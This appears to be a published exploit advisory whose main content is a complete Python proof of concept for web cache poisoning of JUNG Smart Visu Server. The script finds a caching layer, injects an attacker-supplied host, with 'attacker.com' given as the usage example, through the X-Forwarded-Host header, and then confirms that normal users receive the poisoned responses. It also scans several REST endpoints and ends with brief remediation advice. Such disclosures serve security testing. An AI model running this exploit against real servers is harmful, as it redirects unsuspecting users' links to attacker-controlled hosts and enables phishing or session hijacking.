=============================================================================================================================================
| # Title     : JUNG Smart Visu Server - Advanced Cache Poisoning Exploit
| # Author    : indoushka
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.3 (64 bits)
| # Vendor    : https://www.jung-group.com/en-DE
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/215522/ & ZSL-2026-5970

[+] Summary : This Python script is a PoC designed to detect and validate a web cache poisoning vulnerability in JUNG Smart Visu Server. The tool performs a structured and reliable validation process instead of relying on simple reflection checks. It:

    - Detects the presence of a caching layer (CDN, proxy, reverse proxy).
    - Analyzes cache-related HTTP headers (e.g., Age, X-Cache, CF-Cache-Status).
    - Determines whether query strings or specific headers affect the cache key.
    - Attempts cache poisoning using the X-Forwarded-Host header.
    - Verifies the vulnerability by issuing a second, normal request to confirm cache persistence.
    - Collects evidence such as poisoned responses and affected links.

If successful, the script confirms that malicious input can be stored in the cache and served to normal users, demonstrating a confirmed cache poisoning condition. The PoC supports both single-endpoint testing and comprehensive multi-endpoint scanning modes.

# [+] POC :
#!/usr/bin/env python3
"""Detect and validate web cache poisoning via the ``X-Forwarded-Host`` header.

The script probes a target for a caching layer, checks whether the query
string takes part in the cache key, sends one request carrying a
caller-supplied ``X-Forwarded-Host`` value and then issues a second request
without that header.  The issue is reported as confirmed only when the
second response still contains the supplied host.

Only run this against systems you own or are explicitly authorised to test:
a confirmed run means the supplied host was stored in the target's cache.
"""

import hashlib
import json
import sys
import time
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, parse_qs

try:
    import requests
    import urllib3
except ImportError:
    # Deferred: the constructor raises a readable error instead of the
    # script dying with a bare ImportError traceback.
    requests = None
    urllib3 = None

if urllib3 is not None:
    # Certificate verification is disabled on the session below; silence
    # the per-request warning that would otherwise flood the output.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class JUNGCachePoisoningExploit:
    """Cache-poisoning checker for a single target base URL.

    Attributes:
        target_url: Base URL with any trailing ``/`` removed.
        malicious_host: Value sent as ``X-Forwarded-Host`` and searched for
            in responses.
        verbose: When false, only WARNING/ERROR/VULN messages are printed.
        timeout: Per-request timeout in seconds.
        session: Shared ``requests.Session`` (TLS verification disabled).
        cache_headers: Response header names collected as cache evidence.
    """

    # Header names recorded by analyze_cache_headers().
    CACHE_HEADERS = (
        'Cache-Control', 'Age', 'X-Cache', 'X-Cache-Lookup',
        'CF-Cache-Status', 'X-Varnish', 'Via', 'X-Proxy-Cache',
        'X-Cache-Status', 'Server-Timing', 'X-Drupal-Cache',
        'X-Nginx-Cache', 'X-Accel-Expires',
    )

    # Headers whose value containing "hit" marks the response as cached.
    HIT_HEADERS = ('X-Cache', 'X-Cache-Lookup', 'CF-Cache-Status')

    def __init__(self, target_url: str, malicious_host: str,
                 verbose: bool = True, timeout: float = 10):
        """Create the checker.

        Args:
            target_url: Base URL of the target, e.g. ``http://host:8080``.
            malicious_host: Host name to inject; must be non-empty.
            verbose: Print INFO/SUCCESS messages as well as warnings.
            timeout: Seconds to wait for each HTTP request.

        Raises:
            RuntimeError: ``requests`` is not installed.
            ValueError: ``malicious_host`` is empty (an empty string is a
                substring of every response and would always "match").
        """
        if requests is None:
            raise RuntimeError(
                "The 'requests' package is required: pip install requests")
        if not malicious_host:
            raise ValueError("malicious_host must be a non-empty string")

        self.target_url = target_url.rstrip('/')
        self.malicious_host = malicious_host
        self.verbose = verbose
        # requests ignores a ``timeout`` attribute set on the Session, so
        # the value is kept here and passed explicitly by _get().
        self.timeout = timeout
        self.session = requests.Session()
        self.session.verify = False
        self.cache_headers = list(self.CACHE_HEADERS)

    @staticmethod
    def _normalize_endpoint(endpoint: str) -> str:
        """Return ``endpoint`` with exactly one leading ``/`` guaranteed."""
        if not endpoint:
            return "/"
        return endpoint if endpoint.startswith('/') else f"/{endpoint}"

    def _get(self, url: str, headers: Optional[Dict[str, str]] = None):
        """GET ``url`` through the shared session with the timeout applied."""
        return self.session.get(url, headers=headers, timeout=self.timeout)

    def _poisoned_links(self, data) -> List[str]:
        """Return ``link`` strings in a JSON list that contain the host.

        Items that are not dicts, or whose ``link`` is not a string, are
        skipped rather than aborting the whole extraction.
        """
        if not isinstance(data, list):
            return []
        links = []
        for item in data:
            if not isinstance(item, dict):
                continue
            link = item.get('link')
            if isinstance(link, str) and self.malicious_host in link:
                links.append(link)
        return links

    def log(self, message: str, level: str = "INFO"):
        """Print ``message`` with a coloured level prefix.

        INFO and SUCCESS are suppressed when ``self.verbose`` is false.
        """
        colors = {
            "INFO": "\033[94m[*]\033[0m",
            "SUCCESS": "\033[92m[+]\033[0m",
            "WARNING": "\033[93m[!]\033[0m",
            "ERROR": "\033[91m[-]\033[0m",
            "VULN": "\033[91m[OK]\033[0m"
        }
        if self.verbose or level in ["ERROR", "VULN", "WARNING"]:
            print(f"{colors.get(level, '[*]')} {message}")

    def analyze_cache_headers(self, headers: Dict) -> Dict:
        """Summarise the cache-related headers of one response.

        Header names are matched case-insensitively, so both a plain dict
        and a ``requests`` header mapping are handled the same way.

        Args:
            headers: Mapping of response header name to value.

        Returns:
            Dict with keys ``is_cached``, ``cache_hit`` (bools), ``age``
            (int or ``None``), ``cache_control`` (directive -> value or
            ``True``) and ``cache_headers`` (recorded headers, keyed by
            the name as it appeared in ``headers``).
        """
        cache_info = {
            'is_cached': False,
            'cache_headers': {},
            'cache_control': {},
            'age': None,
            'cache_hit': False
        }

        # lower-cased name -> (name as received, value)
        by_lower = {
            str(name).lower(): (name, value)
            for name, value in (headers or {}).items()
        }

        for wanted in self.cache_headers:
            found = by_lower.get(wanted.lower())
            if found is not None:
                cache_info['cache_headers'][found[0]] = found[1]

        cache_control = by_lower.get('cache-control')
        if cache_control is not None:
            for directive in str(cache_control[1]).split(','):
                directive = directive.strip().lower()
                if not directive:
                    # Trailing or doubled commas would otherwise add '' keys.
                    continue
                key, sep, value = directive.partition('=')
                cache_info['cache_control'][key.strip()] = (
                    value.strip() if sep else True)

        age = by_lower.get('age')
        if age is not None:
            try:
                cache_info['age'] = int(str(age[1]).strip())
            except ValueError:
                # Malformed Age header: leave it unset.
                pass
            else:
                cache_info['is_cached'] = True
                cache_info['cache_hit'] = cache_info['age'] > 0

        for wanted in self.HIT_HEADERS:
            found = by_lower.get(wanted.lower())
            if found is None:
                continue
            name, value = found
            if 'hit' in str(value).lower():
                cache_info['cache_hit'] = True
                cache_info['is_cached'] = True
            cache_info['cache_headers'][name] = value

        return cache_info

    def detect_caching_layer(self, endpoint: str = "/rest/items") -> Dict:
        """Detect whether responses for ``endpoint`` are served from a cache.

        The same uniquely-parameterised URL is requested twice; a cache hit
        or positive ``Age`` on the second response indicates a cache.

        Args:
            endpoint: Path to probe (defaults to the original fixed path).

        Returns:
            Dict with ``has_cache``, ``cache_type`` and ``cache_details``.
            Request errors are logged and reported as "no cache".
        """
        cache_layer = {
            'has_cache': False,
            'cache_type': None,
            'cache_details': {}
        }

        endpoint = self._normalize_endpoint(endpoint)
        test_param = f"test_{int(time.time())}"
        url = f"{self.target_url}{endpoint}?{test_param}=1"

        try:
            response1 = self._get(url)
            cache1 = self.analyze_cache_headers(response1.headers)

            time.sleep(0.5)

            response2 = self._get(url)
            cache2 = self.analyze_cache_headers(response2.headers)
        except requests.RequestException as e:
            self.log(f"Error detecting cache: {str(e)}", "ERROR")
            return cache_layer

        if not (cache2.get('cache_hit') or (cache2.get('age') and cache2['age'] > 0)):
            self.log("No caching layer detected", "WARNING")
            return cache_layer

        cache_layer['has_cache'] = True
        cache_layer['cache_details']['first_request'] = cache1
        cache_layer['cache_details']['second_request'] = cache2

        # Later matches deliberately override earlier, more generic ones.
        seen = response2.headers
        if 'X-Cache' in seen:
            cache_layer['cache_type'] = 'Generic Proxy Cache'
        if 'CF-Cache-Status' in seen:
            cache_layer['cache_type'] = 'CloudFlare CDN'
        if 'X-Varnish' in seen:
            cache_layer['cache_type'] = 'Varnish Cache'
        if 'nginx' in seen.get('Via', '').lower():
            cache_layer['cache_type'] = 'Nginx Proxy'

        self.log(f"Detected caching layer: {cache_layer['cache_type'] or 'Unknown'}", "SUCCESS")
        return cache_layer

    def test_cache_key_variations(self, endpoint: str) -> Dict:
        """Probe which request variations change the response for ``endpoint``.

        Returns:
            Dict with ``query_string_matters`` (bodies differed between two
            distinct query strings), ``vary_headers`` (names listed in the
            ``Vary`` response header) and ``headers_matter`` (those of
            Cookie/Authorization/User-Agent whose value changed the body).
            Request errors are logged and the partial result returned.
        """
        cache_key_info = {
            'query_string_matters': False,
            'headers_matter': {},
            'vary_headers': []
        }

        base_url = f"{self.target_url}{self._normalize_endpoint(endpoint)}"
        test_payload = f"test_{time.time_ns()}"
        url1 = f"{base_url}?test1={test_payload}"
        url2 = f"{base_url}?test2={test_payload}"

        try:
            response1 = self._get(url1)
            response2 = self._get(url2)

            if response1.content != response2.content:
                cache_key_info['query_string_matters'] = True

            if 'Vary' in response1.headers:
                vary_headers = [h.strip() for h in response1.headers['Vary'].split(',')]
                cache_key_info['vary_headers'] = vary_headers

                for vary_header in vary_headers:
                    if vary_header.lower() not in ('cookie', 'authorization', 'user-agent'):
                        continue
                    resp1 = self._get(url1, headers={vary_header: 'test1'})
                    resp2 = self._get(url1, headers={vary_header: 'test2'})
                    if resp1.content != resp2.content:
                        cache_key_info['headers_matter'][vary_header] = True
        except requests.RequestException as e:
            self.log(f"Error testing cache key: {str(e)}", "ERROR")

        return cache_key_info

    def attempt_cache_poisoning(self, endpoint: str = "/rest/items") -> Tuple[bool, Dict]:
        """Attempt to poison the cache and verify with a second request.

        Args:
            endpoint: Path to test.

        Returns:
            ``(True, evidence)`` when the second, header-free request still
            contains the injected host; otherwise ``(False, {'error': ...})``
            with ``error`` one of ``no_cache``, ``request_failed``,
            ``no_reflection`` or ``poisoning_failed``.
        """
        endpoint = self._normalize_endpoint(endpoint)
        self.log(f"\n[*] Attempting cache poisoning on {endpoint}")

        cache_layer = self.detect_caching_layer(endpoint)
        if not cache_layer['has_cache']:
            self.log("No cache detected, cannot perform cache poisoning", "WARNING")
            return False, {'error': 'no_cache'}

        cache_key_info = self.test_cache_key_variations(endpoint)
        self.log(f"Query string affects cache key: {cache_key_info['query_string_matters']}")

        poison_param = "poison_test"
        poison_url = f"{self.target_url}{endpoint}"
        if cache_key_info['query_string_matters']:
            poison_url = f"{poison_url}?{poison_param}=1"

        headers = {
            "User-Agent": "Mozilla/5.0 (Poisoning-Test)",
            "X-Forwarded-Host": self.malicious_host,
            "Accept": "application/json",
            "Cache-Control": "no-cache"
        }

        self.log(f"Sending poisoned request with X-Forwarded-Host: {self.malicious_host}")
        try:
            poison_response = self._get(poison_url, headers=headers)
        except requests.RequestException as e:
            # Report and move on so a multi-endpoint scan is not aborted.
            self.log(f"Poisoning request failed: {str(e)}", "ERROR")
            return False, {'error': 'request_failed'}

        if self.malicious_host not in poison_response.text:
            self.log("Malicious host not reflected in response", "ERROR")
            return False, {'error': 'no_reflection'}

        self.log("Malicious host reflected in response", "SUCCESS")
        self.log("\n[*] Verifying cache poisoning with second request...")
        time.sleep(1)

        verify_headers = {
            "User-Agent": "Mozilla/5.0 (Normal-User)",
            "Accept": "application/json"
        }
        try:
            verify_response = self._get(poison_url, headers=verify_headers)
        except requests.RequestException as e:
            self.log(f"Verification request failed: {str(e)}", "ERROR")
            return False, {'error': 'request_failed'}

        cache_info = self.analyze_cache_headers(verify_response.headers)

        if self.malicious_host not in verify_response.text:
            self.log("Cache poisoning failed - normal request doesn't show malicious host", "WARNING")
            self.log("Checking cache headers of normal request:")
            for header, value in cache_info['cache_headers'].items():
                self.log(f" {header}: {value}")
            return False, {'error': 'poisoning_failed'}

        self.log("CACHE POISONING CONFIRMED!", "VULN")
        self.log(f"Malicious host '{self.malicious_host}' served to normal user", "VULN")
        if cache_info['cache_hit']:
            self.log("Response came from cache (cache hit)", "SUCCESS")

        evidence = {
            'poisoned_url': poison_url,
            'malicious_host': self.malicious_host,
            'cache_layer': cache_layer,
            'cache_headers': cache_info,
            'poisoned_response_sample': poison_response.text[:500] + "...",
            'verified_response_sample': verify_response.text[:500] + "..."
        }

        try:
            data = verify_response.json()
        except ValueError:
            # Body is not JSON; link extraction simply does not apply.
            data = None
        if isinstance(data, list):
            evidence['poisoned_links'] = self._poisoned_links(data)[:5]

        return True, evidence

    def comprehensive_scan(self):
        """Run attempt_cache_poisoning() over a fixed list of endpoints.

        Returns:
            List of ``{'endpoint': ..., 'evidence': ...}`` dicts, one per
            endpoint where poisoning was confirmed.
        """
        self.log("\n" + "="*60)
        self.log("Starting comprehensive cache poisoning scan", "INFO")
        self.log("="*60)

        endpoints = [
            "/rest/items",
            "/rest/ui",
            "/rest/configuration",
            "/rest/devices",
            "/",
            "/api/v1/items"
        ]

        vulnerable_endpoints = []
        for endpoint in endpoints:
            self.log(f"\n[*] Testing endpoint: {endpoint}")
            success, result = self.attempt_cache_poisoning(endpoint)

            if success:
                vulnerable_endpoints.append({
                    'endpoint': endpoint,
                    'evidence': result
                })
                # Only announce links when at least one was actually found.
                if result.get('poisoned_links'):
                    self.log("\nPoisoned links detected:", "VULN")
                    for link in result['poisoned_links']:
                        self.log(f" {link}", "VULN")

            # Pause between endpoints to keep the request rate low.
            time.sleep(2)

        return vulnerable_endpoints


def main():
    """Command-line entry point.

    Usage: ``exploit_advanced.py <target_url> <malicious_host>
    [--scan | --endpoint <path>]``.  Exits with status 1 when the two
    positional arguments are missing.
    """
    if len(sys.argv) < 3:
        print("Usage: python3 exploit_advanced.py <target_url> <malicious_host> [options]")
        print("Example: python3 exploit_advanced.py http://10.0.0.16:8080 attacker.com")
        print("Options:")
        print(" --scan Perform comprehensive scan of all endpoints")
        print(" --endpoint <path> Specify custom endpoint")
        sys.exit(1)

    target = sys.argv[1]
    malicious = sys.argv[2]

    exploit = JUNGCachePoisoningExploit(target, malicious, verbose=True)

    if "--scan" in sys.argv:
        results = exploit.comprehensive_scan()
        print("\n" + "="*60)
        print("SCAN RESULTS")
        print("="*60)

        if results:
            print(f"\nFound {len(results)} vulnerable endpoints:")
            for r in results:
                print(f" - {r['endpoint']}")
                sample = r['evidence'].get('poisoned_links')
                if sample:
                    print(" Sample poisoned links:")
                    for link in sample[:3]:
                        print(f" {link}")
        else:
            print("\nNo vulnerable endpoints found (or cache poisoning not confirmed)")
        return

    endpoint = "/rest/items"
    # The last "--endpoint <path>" pair on the command line wins.
    for i, arg in enumerate(sys.argv):
        if arg == "--endpoint" and i + 1 < len(sys.argv):
            endpoint = sys.argv[i + 1]

    success, evidence = exploit.attempt_cache_poisoning(endpoint)

    if success:
        print("\n" + "="*60)
        print("VULNERABLE TO CACHE POISONING")
        print("="*60)
        print(f"Target: {target}")
        print(f"Endpoint: {endpoint}")
        print(f"Malicious host: {malicious}")

        if evidence.get('poisoned_links'):
            print("\nPoisoned links detected:")
            for link in evidence['poisoned_links']:
                print(f" {link}")

        print("\n[!] Recommendations:")
        print(" - Update JUNG Smart Visu Server")
        print(" - Validate/sanitize X-Forwarded-Host header")
        print(" - Configure proxy to strip or validate proxy headers")
        print(" - Implement host header whitelisting")
    else:
        print("\n Target not vulnerable to confirmed cache poisoning")


if __name__ == "__main__":
    main()

# Greetings to :======================================================================
# jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
# ====================================================================================